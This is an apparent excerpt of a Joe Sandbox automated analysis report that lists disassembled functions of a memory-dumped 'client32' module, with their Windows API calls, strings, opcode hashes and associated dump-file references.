MessageBeep.USER32(00000000,?,11071AD8,?,?,?,1106D28C,006A006A,B24479DC,?,?,00000000,11182C98,000000FF,?,11071AD8), ref: 110679EB

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: BeepMessage
String ID:
API String ID: 2359647504-0
Opcode ID: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
Instruction ID: 4a014cbc1c5237b7f0567ced4e31e585fd70e1907f22ab32dda50b08ea234cb0
Opcode Fuzzy Hash: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
Instruction Fuzzy Hash: 5831C275640610ABE728CF54C882F77B3F8EF84B10F01859AF95687685E3B5E950C3B1

Function 11049130 Relevance: 6.1, APIs: 4, Instructions: 112windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731

_malloc.LIBCMT ref: 110491DD
_memmove.LIBCMT ref: 110491EA
SendMessageTimeoutA.USER32(?,0000004A,0001033C,?,00000002,00001388,?), ref: 11049224
_free.LIBCMT ref: 1104922B

Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
String ID:
API String ID: 176360892-0
Opcode ID: 46178d18f3e88452c3922ee6de201f6dc9fb41c74dc40f097fdd869246f2e59b
Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
Opcode Fuzzy Hash: 46178d18f3e88452c3922ee6de201f6dc9fb41c74dc40f097fdd869246f2e59b
Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1

Function 110297F0 Relevance: 6.1, APIs: 4, Instructions: 104sleepthreadwindowCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00001000,11027690,00000000,00000000,111EE468), ref: 11029813
Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029832
PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029854
Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102985C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: SleepThread$CreateMessagePost
String ID:
API String ID: 3347742789-0
Opcode ID: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
Instruction ID: 2ae3116f5df8233203c0b5b7c047d092e18a9fbb085bfb1a1d8cc4b180184980
Opcode Fuzzy Hash: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
Instruction Fuzzy Hash: F331C576E43232EBE212DBD9CC80FB6B798A745B68F514135F928972C8D2706841CFD0

Function 11179775 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111797A9
__isleadbyte_l.LIBCMT ref: 111797DC
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117980D
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117987B

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
Instruction ID: dd7da2bd4d1e27f38930cbdbffb8ca2b0741d821671db88b966082c1cf8912a5
Opcode Fuzzy Hash: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
Instruction Fuzzy Hash: 1331AE31A0029EEFEB01DF64C9849AEFFA6EF01330F1585A9E4648B290F730D954CB51

Function 110B3700 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000002C,B24479DC,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B372F
LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B376F
SetEvent.KERNEL32(?), ref: 110B37EA
LeaveCriticalSection.KERNEL32(0000002C), ref: 110B37F1

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
Instruction ID: 8acebb29280036c6a802c58c088d91b2f5c0a2bed23f5f36a778171c733041f7
Opcode Fuzzy Hash: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
Instruction Fuzzy Hash: BC314A75A44B059FD325CF69C980B9AFBE4FB48314F10862EE85AC7B50EB34A850CB90

Function 11043660 Relevance: 6.1, APIs: 4, Instructions: 84windowCOMMON

Download Yara Rule

APIs

Part of subcall function 110684E0: EnterCriticalSection.KERNEL32(?,B24479DC,00000000,00002710,00000001,11027140,B24479DC,00000000,00002710,?,?,00000000,11182BE8,000000FF,?,110294CE), ref: 1106858A

SendMessageA.USER32(?,000006D4,00000000,00000000,0034FEA8,000000D0,B24479DC,00000000,00000000,00000000,?,?,?,?,?,11181208), ref: 110436CA
GetWindowLongA.USER32(00000000,000000F0), ref: 110436D1
IsWindow.USER32(00000000), ref: 110436DE
GetWindowRect.USER32(00000000,1104A5A0), ref: 110436F5

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$CriticalEnterLongMessageRectSectionSend
String ID:
API String ID: 3558565530-0
Opcode ID: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
Instruction ID: d8135c0911b88fc1f510a9c52ef20d21577c3519517ef8ed33f3b43d0edb38f0
Opcode Fuzzy Hash: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
Instruction Fuzzy Hash: 3121A276E45259ABD714CF94DA80B9DF7B8FB45724F204269E82597780DB30A900CB54

Function 110B3810 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000002C,B24479DC,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B383F
LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B385E
SetEvent.KERNEL32(?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B38A4
LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B38AB

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: 2035c8d51027f8a8a2080d74f0c386d41a95bf140d8a0374962db8ad330c7d77
Instruction ID: 58af85e25f85a47ca3d7134065c146d8b9d4bc60aa5d6e9c2c74ed7e6f1a2d6e
Opcode Fuzzy Hash: 2035c8d51027f8a8a2080d74f0c386d41a95bf140d8a0374962db8ad330c7d77
Instruction Fuzzy Hash: 1C21DF72A047089FD315CFA8D884B9AF7E8FB48315F104A3EE816C7A04E739B404CB94

Function 11143070 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

SetBkColor.GDI32(?,?), ref: 11143091
SetRect.USER32 ref: 111430A9
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
SetBkColor.GDI32(?,00000000), ref: 111430C8

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$RectText
String ID:
API String ID: 4034337308-0
Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5

Function 110675A0 Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 110675BB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110675EC
DispatchMessageA.USER32(?), ref: 110675F6
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11067604

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchEvent
String ID:
API String ID: 4257095537-0
Opcode ID: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
Instruction ID: aec9ad63bee144445ad482119ba180fbd35a23c038e7556534d76a428b5108da
Opcode Fuzzy Hash: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
Instruction Fuzzy Hash: E701B171A40205ABE704DE94CC81F96B7ADAB88714F5001A5FA14AF1C5EBB5A541CBF0

Function 11007255 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

CreateWindowExA.USER32 ref: 110073A7
SetFocus.USER32 ref: 11007403

Strings

edit, xrefs: 110073A1

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFocusWindow_malloc_memsetwsprintf
String ID: edit
API String ID: 1305092643-2167791130
Opcode ID: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
Opcode Fuzzy Hash: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60

Function 11009270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110092E5
_memmove.LIBCMT ref: 11009336

Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA

Strings

string too long, xrefs: 110092E0

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0

Function 110E1260 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110E12C3
_memmove.LIBCMT ref: 110E131D

Strings

string too long, xrefs: 110E12BE

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1

Function 1103B150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1103B162
_free.LIBCMT ref: 1103B25B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

CLTCONN.CPP, xrefs: 1103B175

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

